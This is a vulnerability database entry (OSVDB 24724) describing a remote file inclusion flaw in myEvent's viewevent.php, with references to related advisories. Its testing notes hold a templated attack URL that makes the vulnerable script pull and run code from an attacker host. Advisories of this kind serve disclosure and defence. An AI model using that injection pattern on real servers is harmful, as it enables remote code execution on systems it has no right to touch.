myEvent viewevent.php myevent_path Variable Remote File Inclusion

2006-04-18T05:17:38
ID OSVDB:24724
Type osvdb
Reporter Secunia(vuln@secunia.com)
Modified 2006-04-18T05:17:38

Description

Vulnerability Description

myEvent contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to viewevent.php not properly sanitizing user input supplied to the 'myevent_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off' and the register_globals PHP option is 'on'.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

myEvent contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to viewevent.php not properly sanitizing user input supplied to the 'myevent_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/viewevent.php?myevent_path=[attacker]?&[evilcode]

References:

Vendor URL: http://mywebland.com/ Vendor URL: http://www.mywebland.com/ Secunia Advisory ID:19680 Related OSVDB ID: 24719 Related OSVDB ID: 24723 Related OSVDB ID: 24725 Related OSVDB ID: 24720 Related OSVDB ID: 24722 Nessus Plugin ID:21246 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0257.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0244.html ISS X-Force ID: 25887 FrSIRT Advisory: ADV-2006-1384 CVE-2006-4083 Bugtraq ID: 17575